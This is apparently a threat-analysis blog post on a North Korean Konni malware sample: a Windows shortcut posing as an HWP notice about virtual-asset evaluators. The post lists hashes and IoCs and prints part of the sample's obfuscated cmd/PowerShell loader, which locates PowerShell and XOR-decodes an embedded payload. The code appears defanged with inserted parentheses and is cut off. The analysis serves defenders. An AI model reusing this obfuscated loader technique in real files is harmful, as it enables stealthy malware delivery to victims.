Malware made by the North Korean hacking group Konni: 가상자산 관련 외부평가위원 위촉 안내.hwp (2025.5.2) ("Notice of appointment of external evaluation committee members for virtual assets")
Today I will analyze 가상자산 관련 외부평가위원 위촉 안내.hwp (2025.5.2), a piece of malware disguised as an HWP document and built to steal virtual assets (cryptocurrency). It comes from Konni, a sister group of Kimsuky and Lazarus that operates under North Korea's Reconnaissance General Bureau and continues to seriously threaten the security of the Republic of Korea.
Filename: 가상자산 관련 외부평가위원 위촉 안내.hwp.lnk
Size: 2 MB
MD5: cbd734874b44e73ce155998db7e6663a
SHA-1: eb4e370782f214d376c6041a06140868ba5f432d
SHA-256: f9f3b762ed1719bf141c38f8c4f21d76cd65c5ac6c62a4b94ce68569ce87178c
Note the double extension: the visible name ends in .hwp, but the file is a Windows shortcut (.lnk). Its command line abuses PowerShell: the cmd.exe for /f loop lists the executables under %systemroot%\System32\WindowsPowershell\ and picks the one matching rshell.exe with findstr, so powershell.exe is located without its name ever appearing in full, and the inline script is then handed to it. When the malware runs, the decoy file it drops is an HWP document.
Inside the malware (LNK StringData)
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^|
findstr /i rshell.exe') do (if exist "%f" (%f "function bother{param($result); <#pursue cou
rage#>$access = $result.substring(0,$result.l(e)ngth-4) + ''; <#red left#>return $access;};f
unction emergency{param($propose); re''m''o(v)''e''-it''e''m $propose -Force;};function disc
ourse{param($orientation,$protecti(o)n,$signal,$comment,$comedy);<#station apple#> $egg=N'
'ew''-''O''bj''ect System.IO.FileStream(<#shadow immediate#>$orientation,<#normal get#>[
System(.I)O.FileMode]::Open,<#neck pause#>[System.IO.FileAccess]::Read);<#collection fo
cus#> $egg.Seek(<#one care#>$protection,[System.IO.See(kO)rigin]::Begin);<#mood which#>
$present=$signal*0x01;<#clas(s)(i)c professor#> $truth=New''-O''bj''ect byte[] <#etc mos
tly#>$signal; <#chef consequence#(>) $consume=Ne''w-''Obj''ec''t byte[] <#ancient visibl
e#>$pre(s)ent; <#crack occupy#>$egg.Read(<#exercise actually#>$consume,0,<#encounter car
ef(ul)ly#>$present); $egg.Close();$stream=0;while($stream -lt $(s)ignal){<#claim thank#>
$truth[$stream]=$consume[$stream*0x(0)1] -bxor $comment;$stream++;}<#subsequent bathroom
#> s''e(t)-''c''o''n''(t)''ent $comedy <#block greatest#> $truth -(E)ncoding <#comedy co
uncil#> Byte;};fu(n0ction massive{$enter = $env:public<#heavy deeply#> + '\' +<#guess pr
oud#> 'do'(+)'cu'(+)'m'+'en'+'ts(');<#incredible coat#> retu(r)n $enter;};funct(i)on hab
it{param($con(n)ection); <#here co(n)trol#>$ag(r)eement = Spl''it''-Pa''th $connection;<
#giant t(a)il#> …
IoC
cbd734874b44e73ce155998db7e6663a
eb4e370782f214d376c6041a06140868ba5f432d
f9f3b762ed1719bf141c38f8c4f21d76cd65c5ac6c62a4b94ce68569ce87178c